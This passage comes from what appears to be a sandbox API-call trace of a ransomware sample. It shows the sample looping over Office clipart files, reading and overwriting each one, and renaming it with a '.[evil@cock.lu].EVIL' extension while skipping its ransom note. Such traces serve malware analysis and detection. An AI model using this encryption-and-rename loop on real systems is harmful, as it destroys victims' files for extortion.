_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.939] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02062U.BMP") returned 0x0 [0166.939] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP") returned 0x45 [0166.939] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02062u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.941] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.943] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.943] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.943] _errno () returned 0x84b1160840 [0166.944] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.944] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.944] CloseHandle (hObject=0x1a8) returned 1 [0166.944] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.944] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.944] __uncaught_exception () returned 0x84b1160800 [0166.944] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.944] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02062u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02062u.bmp.[evil@cock.lu].evil")) returned 1 [0166.945] ??_V@YAXPEAX@Z () returned 0x1 [0166.948] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02062U.BMP", dwFileAttributes=0x200) returned 0 [0166.948] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.948] wcsstr (_Str="PH02069J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.948] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG") returned 69 [0166.948] wcscmp (_String1="PH02069J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.948] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02069J.JPG") returned 0x0 [0166.948] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG") returned 0x45 [0166.948] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02069j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.950] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7297, lpOverlapped=0x0) returned 1 [0166.953] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.953] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.953] _errno () returned 0x84b1160840 [0166.953] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.953] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x72a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x72a0, lpOverlapped=0x0) returned 1 [0166.954] CloseHandle (hObject=0x1a8) returned 1 [0166.954] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.954] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.954] __uncaught_exception () returned 0x84b1160800 [0166.954] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.954] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02069j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02069j.jpg.[evil@cock.lu].evil")) returned 1 [0166.955] ??_V@YAXPEAX@Z () returned 0x1 [0166.958] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02069J.JPG", dwFileAttributes=0x200) returned 0 [0166.958] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.958] wcsstr (_Str="PH02071U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.958] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP") returned 69 [0166.958] wcscmp (_String1="PH02071U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.958] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02071U.BMP") returned 0x0 [0166.958] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP") returned 0x45 [0166.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02071u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.960] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0166.963] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.963] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.963] _errno () returned 0x84b1160840 [0166.963] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.963] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0166.963] CloseHandle (hObject=0x1a8) returned 1 [0166.963] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.963] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.963] __uncaught_exception () returned 0x84b1160800 [0166.964] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.964] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02071u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02071u.bmp.[evil@cock.lu].evil")) returned 1 [0166.964] ??_V@YAXPEAX@Z () returned 0x1 [0166.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP", dwFileAttributes=0x200) returned 0 [0166.967] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.967] wcsstr (_Str="PH02074U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.967] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP") returned 69 [0166.967] wcscmp (_String1="PH02074U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.967] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02074U.BMP") returned 0x0 [0166.967] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP") returned 0x45 [0166.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02074u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.969] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.972] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.972] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.972] _errno () returned 0x84b1160840 [0166.972] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.972] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.972] CloseHandle (hObject=0x1a8) returned 1 [0166.972] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.972] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.972] __uncaught_exception () returned 0x84b1160800 [0166.972] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.972] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02074u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02074u.bmp.[evil@cock.lu].evil")) returned 1 [0166.973] ??_V@YAXPEAX@Z () returned 0x1 [0166.976] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP", dwFileAttributes=0x200) returned 0 [0166.976] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.976] wcsstr (_Str="PH02208U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.976] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP") returned 69 [0166.976] wcscmp (_String1="PH02208U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.976] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02208U.BMP") returned 0x0 [0166.976] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP") returned 0x45 [0166.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02208u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.978] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.980] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.980] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.981] _errno () returned 0x84b1160840 [0166.981] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.981] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.981] CloseHandle (hObject=0x1a8) returned 1 [0166.981] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.981] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.981] __uncaught_exception () returned 0x84b1160800 [0166.981] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.981] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02208u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02208u.bmp.[evil@cock.lu].evil")) returned 1 [0166.982] ??_V@YAXPEAX@Z () returned 0x1 [0166.985] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP", dwFileAttributes=0x200) returned 0 [0166.985] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.985] wcsstr (_Str="PH02223U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.985] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP") returned 69 [0166.985] wcscmp (_String1="PH02223U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.985] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02223U.BMP") returned 0x0 [0166.985] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP") returned 0x45 [0166.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02223u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.987] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0166.989] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.989] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.989] _errno () returned 0x84b1160840 [0166.990] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.990] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0166.990] CloseHandle (hObject=0x1a8) returned 1 [0166.990] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.990] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.990] __uncaught_exception () returned 0x84b1160800 [0166.990] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.990] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02223u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02223u.bmp.[evil@cock.lu].evil")) returned 1 [0166.991] ??_V@YAXPEAX@Z () returned 0x1 [0166.994] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP", dwFileAttributes=0x200) returned 0 [0166.994] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.994] wcsstr (_Str="PH02291U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.994] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP") returned 69 [0166.994] wcscmp (_String1="PH02291U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.994] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02291U.BMP") returned 0x0 [0166.994] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP") returned 0x45 [0166.994] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02291u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.996] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0166.999] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.999] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.999] _errno () returned 0x84b1160840 [0166.999] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.999] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0166.999] CloseHandle (hObject=0x1a8) returned 1 [0167.000] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.000] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.000] __uncaught_exception () returned 0x84b1160800 [0167.000] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.000] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02291u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02291u.bmp.[evil@cock.lu].evil")) returned 1 [0167.001] ??_V@YAXPEAX@Z () returned 0x1 [0167.003] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP", dwFileAttributes=0x200) returned 0 [0167.003] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.003] wcsstr (_Str="PH02398U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.003] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP") returned 69 [0167.004] wcscmp (_String1="PH02398U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.004] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02398U.BMP") returned 0x0 [0167.004] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP") returned 0x45 [0167.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02398u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.006] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0167.008] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.008] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.008] _errno () returned 0x84b1160840 [0167.008] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.008] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0167.008] CloseHandle (hObject=0x1a8) returned 1 [0167.008] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.009] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.009] __uncaught_exception () returned 0x84b1160800 [0167.009] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.009] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02398u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02398u.bmp.[evil@cock.lu].evil")) returned 1 [0167.009] ??_V@YAXPEAX@Z () returned 0x1 [0167.012] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP", dwFileAttributes=0x200) returned 0 [0167.012] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.012] wcsstr (_Str="PH02412K.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.012] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG") returned 69 [0167.012] wcscmp (_String1="PH02412K.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.012] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02412K.JPG") returned 0x0 [0167.012] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG") returned 0x45 [0167.012] CreateFileW 